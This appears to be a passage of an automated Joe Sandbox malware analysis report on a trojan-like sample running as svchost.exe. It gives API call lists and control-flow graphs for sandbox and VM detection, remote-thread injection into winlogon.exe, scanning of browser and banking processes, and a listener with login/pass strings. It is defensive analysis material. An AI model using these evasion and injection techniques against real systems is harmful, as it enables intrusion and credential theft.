                                                                                                                                                                                                                • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                                Function 02BB3A20 Relevance: 61.8, APIs: 22, Strings: 13, Instructions: 514threadmemorynativeCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 848 2bb3a20-2bb3a3f 849 2bb4078-2bb4083 848->849 850 2bb3a45-2bb3a4a 848->850 850->849 851 2bb3a50-2bb3a55 850->851 851->849 852 2bb3a5b-2bb3a60 851->852 852->849 853 2bb3a66-2bb3a6b 852->853 853->849 854 2bb3a71-2bb3a76 853->854 854->849 855 2bb3a7c-2bb3a9d 854->855 855->849 856 2bb3aa3-2bb3aa6 855->856 857 2bb3aa8-2bb3ad5 VirtualQuery 856->857 858 2bb3aff-2bb3b03 856->858 860 2bb3ad7-2bb3aec call 2bd5460 * 2 857->860 861 2bb3af5-2bb3afd 857->861 858->849 859 2bb3b09-2bb3b19 call 2bb3830 858->859 859->849 866 2bb3b1f-2bb3b40 call 2bb38a0 VirtualAlloc 859->866 860->861 871 2bb3aee 860->871 861->856 861->858 866->849 872 2bb3b46-2bb3b66 SymSetOptions GetCurrentProcess SymInitialize 866->872 871->861 873 2bb3b68-2bb3b9e GetCurrentProcess call 2bb3910 872->873 874 2bb3ba3-2bb3ba5 872->874 873->874 876 2bb3ba8-2bb3bad 874->876 876->876 877 2bb3baf-2bb3bb5 876->877 878 2bb3bb8-2bb3bbd 877->878 878->878 879 2bb3bbf-2bb3c5e call 2bd5460 * 2 GetLastError _snprintf call 2bd5460 878->879 886 2bb3cc2-2bb3cc6 879->886 887 2bb3c60-2bb3c7f call 2bd5460 * 2 879->887 889 2bb3cc8-2bb3ce3 GetCurrentThread ZwQueryInformationThread 886->889 890 2bb3d2d-2bb3d4e 886->890 887->886 903 2bb3c81-2bb3c84 887->903 889->890 893 2bb3ce5-2bb3ceb 889->893 891 2bb3d50-2bb3d56 890->891 891->891 894 2bb3d58-2bb3d80 891->894 896 2bb3cf0-2bb3cf6 893->896 898 2bb3dae-2bb3db1 894->898 899 2bb3d82-2bb3d85 894->899 896->896 897 2bb3cf8-2bb3d28 GetCurrentProcess call 2bb3910 896->897 897->890 904 2bb3db4-2bb3db9 898->904 899->898 902 2bb3d87-2bb3d8b 899->902 905 2bb3d8d-2bb3d91 902->905 906 2bb3da5-2bb3dac 902->906 907 2bb3c85-2bb3c8b 903->907 904->904 908 2bb3dbb-2bb3dbd 904->908 905->906 909 2bb3d93-2bb3da0 GetCurrentProcess call 2bb3910 905->909 906->898 906->899 907->907 910 2bb3c8d-2bb3cbf 907->910 911 2bb3dc3-2bb3dc5 908->911 912 2bb4067-2bb4072 VirtualFree 908->912 909->906 910->886 914 2bb3dd0-2bb3de0 911->914 912->849 914->914 915 2bb3de2-2bb3df4 PathAddBackslashA 914->915 916 2bb3df6-2bb3dfb 915->916 916->916 917 2bb3dfd-2bb3e07 916->917 918 2bb3e08-2bb3e0e 917->918 918->918 919 2bb3e10-2bb3e3c PathAddBackslashA call 2bb3080 call 2bb7980 918->919 924 2bb3e40-2bb3e50 919->924 924->924 925 2bb3e52-2bb3e5e PathAddBackslashA 924->925 926 2bb3e60-2bb3e65 925->926 926->926 927 2bb3e67-2bb3e6f 926->927 928 2bb3e70-2bb3e76 927->928 928->928 929 2bb3e78-2bb3ef4 GetDateFormatA GetTimeFormatA _snprintf 928->929 930 2bb3ef6-2bb3efb 929->930 930->930 931 2bb3efd-2bb3f07 930->931 932 2bb3f08-2bb3f0e 931->932 932->932 933 2bb3f10-2bb3f1e 932->933 934 2bb3f20-2bb3f30 933->934 934->934 935 2bb3f32-2bb3f3e PathAddBackslashA 934->935 936 2bb3f40-2bb3f45 935->936 936->936 937 2bb3f47-2bb3f51 936->937 938 2bb3f52-2bb3f58 937->938 938->938 939 2bb3f5a-2bb3f6f 938->939 940 2bb3f70-2bb3f76 939->940 940->940 941 2bb3f78-2bb3f9f call 2bb4b00 940->941 944 2bb3fa0-2bb3fb0 941->944 944->944 945 2bb3fb2-2bb3fbe PathAddBackslashA 944->945 946 2bb3fc0-2bb3fc5 945->946 946->946 947 2bb3fc7-2bb3fd1 946->947 948 2bb3fd2-2bb3fd8 947->948 948->948 949 2bb3fda-2bb3fef 948->949 950 2bb3ff0-2bb3ff6 949->950 950->950 951 2bb3ff8-2bb4025 call 2bd54a0 call 2bb72e0 950->951 951->912 956 2bb4027-2bb402f 951->956 957 2bb4030-2bb4035 956->957 957->957 958 2bb4037-2bb4062 call 2bb7620 call 2bb7310 PathAddBackslashA call 2bc39d0 call 2bb79c0 957->958 958->912
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB3ACA
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02BB3B33
                                                                                                                                                                                                                • SymSetOptions.DBGHELP(00000006), ref: 02BB3B48
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02BB3B58
                                                                                                                                                                                                                • SymInitialize.DBGHELP(00000000), ref: 02BB3B5B
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3B9A
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02BB3C27
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3C47
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02BB3CD4
                                                                                                                                                                                                                • ZwQueryInformationThread.NTDLL(00000000), ref: 02BB3CDB
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 02BB3D20
                                                                                                                                                                                                                  • Part of subcall function 02BD5460: VirtualQuery.KERNEL32(02BD5460,?,0000001C), ref: 02BD5488
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • DEBUG, xrefs: 02BB404D
                                                                                                                                                                                                                • debug_%s_%s.log, xrefs: 02BB3ED4
                                                                                                                                                                                                                • csm, xrefs: 02BB3A45
                                                                                                                                                                                                                • main, xrefs: 02BB3BEE
                                                                                                                                                                                                                • HH;mm;ss, xrefs: 02BB3EB2
                                                                                                                                                                                                                • ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02BB3C3E
                                                                                                                                                                                                                • CallStack:, xrefs: 02BB3D58
                                                                                                                                                                                                                • ThreadStart = , xrefs: 02BB3CF8
                                                                                                                                                                                                                • scr.bmp, xrefs: 02BB3FF8
                                                                                                                                                                                                                • Self exception = TRUE, xrefs: 02BB3C8D
                                                                                                                                                                                                                • sysinfo.log, xrefs: 02BB3F78
                                                                                                                                                                                                                • ExceptionAddress = , xrefs: 02BB3B68
                                                                                                                                                                                                                • dd;MMM;yyyy, xrefs: 02BB3E8B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Current$ProcessQueryVirtual$Thread$AllocErrorInformationInitializeLastOptions_snprintf
                                                                                                                                                                                                                • String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
                                                                                                                                                                                                                • API String ID: 2913300210-1369666974
                                                                                                                                                                                                                • Opcode ID: a28fbc72afd03309268ea6a11ea2c29d42ed3ffc42533902aaf88a7e36743fe4
                                                                                                                                                                                                                • Instruction ID: 0839a6c44019a311880b14a3d3d9dfb0d7b2d70f0c7ef853d7c2cae4017eefb5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a28fbc72afd03309268ea6a11ea2c29d42ed3ffc42533902aaf88a7e36743fe4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D712E371A006059FDB25CF68C894BEABBF2FF49304F5485D8E949DB351DBB1A948CB80
                                                                                                                                                                                                                Function 00403A20 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1180 403a20-403a68 RegOpenKeyExA 1181 403a6a-403a8d RegQueryValueExA 1180->1181 1182 403acd-403b05 GetUserNameA CharUpperA strstr 1180->1182 1185 403a9b-403aac RegCloseKey 1181->1185 1186 403a8f-403a99 RegCloseKey 1181->1186 1183 403beb 1182->1183 1184 403b0b-403b1e strstr 1182->1184 1187 403bec-403bf2 1183->1187 1184->1183 1189 403b24-403b37 strstr 1184->1189 1185->1182 1188 403aae-403ab5 1185->1188 1186->1182 1188->1182 1190 403ab7-403abe 1188->1190 1189->1183 1191 403b3d-403b7b GetSystemWindowsDirectoryA GetVolumeInformationA 1189->1191 1190->1182 1192 403ac0-403ac7 1190->1192 1191->1183 1193 403b7d-403b82 1191->1193 1192->1182 1192->1187 1193->1183 1194 403b84-403b89 1193->1194 1194->1183 1195 403b8b-403b90 1194->1195 1195->1183 1196 403b92-403b97 1195->1196 1196->1183 1197 403b99-403bc3 GetModuleFileNameA StrStrIA 1196->1197 1197->1183 1198 403bc5-403bd5 StrStrIA 1197->1198 1198->1183 1199 403bd7-403be7 StrStrIA 1198->1199 1199->1183 1200 403be9 1199->1200 1200->1183
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                                • API String ID: 1431998568-3499098167
                                                                                                                                                                                                                • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                                • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                                Function 02BC9E40 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1201 2bc9e40-2bc9eba WSAStartup 1202 2bc9ebc-2bc9ebe ExitThread 1201->1202 1203 2bc9ec4-2bc9ed9 socket 1201->1203 1204 2bc9edb-2bc9edd ExitThread 1203->1204 1205 2bc9ee3-2bc9f1d htons * 2 bind 1203->1205 1206 2bc9f1f-2bc9f21 ExitThread 1205->1206 1207 2bc9f27-2bc9f3a listen 1205->1207 1208 2bc9f3c-2bc9f3e ExitThread 1207->1208 1209 2bc9f44-2bc9f53 gethostname 1207->1209 1210 2bc9fcb-2bc9fe3 accept 1209->1210 1211 2bc9f55-2bc9f64 gethostbyname 1209->1211 1213 2bca044-2bca046 ExitThread 1210->1213 1214 2bc9fe5-2bc9ff9 getpeername 1210->1214 1211->1210 1212 2bc9f66-2bc9f6c 1211->1212 1212->1210 1215 2bc9f6e-2bc9f72 1212->1215 1216 2bc9ffb-2bca00b inet_ntoa htons 1214->1216 1217 2bca011-2bca027 CreateThread 1214->1217 1218 2bc9f76-2bc9fc5 inet_ntoa 1215->1218 1216->1217 1219 2bca04c-2bca055 closesocket ExitThread 1217->1219 1220 2bca029-2bca042 CloseHandle accept 1217->1220 1218->1218 1221 2bc9fc7 1218->1221 1220->1213 1220->1214 1221->1210
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                                • String ID: login$pass
                                                                                                                                                                                                                • API String ID: 1705285421-2248183487
                                                                                                                                                                                                                • Opcode ID: 11c2f349901282898cbec11f95baf0441f4e41db33dc55ef95c29a4c0e8eef05
                                                                                                                                                                                                                • Instruction ID: 654927405de22c295f3ba0dbb345389a190b2133247efb9e172250bd07ab3a1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11c2f349901282898cbec11f95baf0441f4e41db33dc55ef95c29a4c0e8eef05
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F651A035948701EFD360CF64D888B6EBBE5FB887A1F508A0DFA65872D1E7709414CB62
                                                                                                                                                                                                                Function 02BC79D0 Relevance: 40.8, APIs: 27, Instructions: 286memorytimesleepCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1236 2bc79d0-2bc79df 1237 2bc79e1-2bc79ec call 2bc78a0 1236->1237 1240 2bc79f2-2bc79fa 1237->1240 1241 2bc7db3-2bc7dbb Sleep 1237->1241 1242 2bc7ae6 1240->1242 1243 2bc7a00-2bc7a3e OpenProcess 1240->1243 1241->1237 1244 2bc7aea-2bc7b35 OpenProcess 1242->1244 1245 2bc7a9a-2bc7aa9 EnterCriticalSection 1243->1245 1246 2bc7a40-2bc7a60 GetProcessTimes 1243->1246 1247 2bc7b88-2bc7b99 EnterCriticalSection 1244->1247 1248 2bc7b37-2bc7b54 GetProcessTimes 1244->1248 1251 2bc7ab0-2bc7ab7 1245->1251 1249 2bc7a70-2bc7a74 1246->1249 1250 2bc7a62-2bc7a6e 1246->1250 1252 2bc7b9b 1247->1252 1253 2bc7bb3-2bc7c63 LeaveCriticalSection VirtualQuery * 2 1247->1253 1256 2bc7b56-2bc7b60 1248->1256 1257 2bc7b62 1248->1257 1258 2bc7a78-2bc7a8a GetHandleInformation 1249->1258 1250->1258 1254 2bc7ad8 1251->1254 1255 2bc7ab9-2bc7abd 1251->1255 1259 2bc7ba0-2bc7ba7 1252->1259 1261 2bc7c65-2bc7c7c call 2bd4cc0 1253->1261 1262 2bc7ada-2bc7adc 1254->1262 1255->1251 1260 2bc7abf-2bc7ad6 LeaveCriticalSection call 2bc7810 1255->1260 1263 2bc7b66-2bc7b78 GetHandleInformation 1256->1263 1257->1263 1258->1245 1264 2bc7a8c-2bc7a91 1258->1264 1265 2bc7bad-2bc7bb1 1259->1265 1266 2bc7d6f-2bc7d7b 1259->1266 1260->1262 1277 2bc7c7e-2bc7c82 1261->1277 1278 2bc7c84-2bc7cab EnterCriticalSection GetProcessHeap HeapAlloc 1261->1278 1262->1243 1269 2bc7ae2 1262->1269 1263->1247 1270 2bc7b7a-2bc7b7f 1263->1270 1264->1245 1271 2bc7a93-2bc7a94 CloseHandle 1264->1271 1265->1253 1265->1259 1266->1244 1272 2bc7d81 1266->1272 1269->1242 1270->1247 1275 2bc7b81-2bc7b82 CloseHandle 1270->1275 1271->1245 1276 2bc7d85-2bc7d89 1272->1276 1275->1247 1276->1241 1279 2bc7d8b-2bc7d9e GetProcessHeap HeapValidate 1276->1279 1277->1261 1277->1278 1280 2bc7d64-2bc7d69 LeaveCriticalSection 1278->1280 1281 2bc7cb1-2bc7cf8 OpenProcess 1278->1281 1282 2bc7daf-2bc7db1 1279->1282 1283 2bc7da0-2bc7da9 GetProcessHeap HeapFree 1279->1283 1280->1266 1284 2bc7d4f-2bc7d5e 1281->1284 1285 2bc7cfa-2bc7d17 GetProcessTimes 1281->1285 1282->1241 1282->1276 1283->1282 1284->1280 1286 2bc7d19-2bc7d23 1285->1286 1287 2bc7d25 1285->1287 1288 2bc7d29-2bc7d3f GetHandleInformation 1286->1288 1287->1288 1288->1284 1289 2bc7d41-2bc7d46 1288->1289 1289->1284 1290 2bc7d48-2bc7d49 CloseHandle 1289->1290 1290->1284
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02BC78B4
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                                  • Part of subcall function 02BC78A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,000002E8), ref: 02BC7A34
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7A58
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7A82
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7A94
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7A9F
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7AC4
                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02BC7B2B
                                                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7B4C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7B70
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC7B82
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7B8D
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7BB8
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C06
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C51
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB80,?,?), ref: 02BC7C90
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02BC7C9A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC7CA1
                                                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 02BC7DB5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateCreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3323447582-0
                                                                                                                                                                                                                • Opcode ID: 471e913d58ad95d26875f4222de12962d07bc318f739be98dc80da4e4755070e
                                                                                                                                                                                                                • Instruction ID: 6fc2fb28b9ba2b7b89b32959095ba37fa917705a70e906e95fca5a00cc656c5e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471e913d58ad95d26875f4222de12962d07bc318f739be98dc80da4e4755070e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EC127B0A483419FD360CF65C884A6BFBE8FB88B54F64895EF699C7240DB709544CF92
                                                                                                                                                                                                                Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                                • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
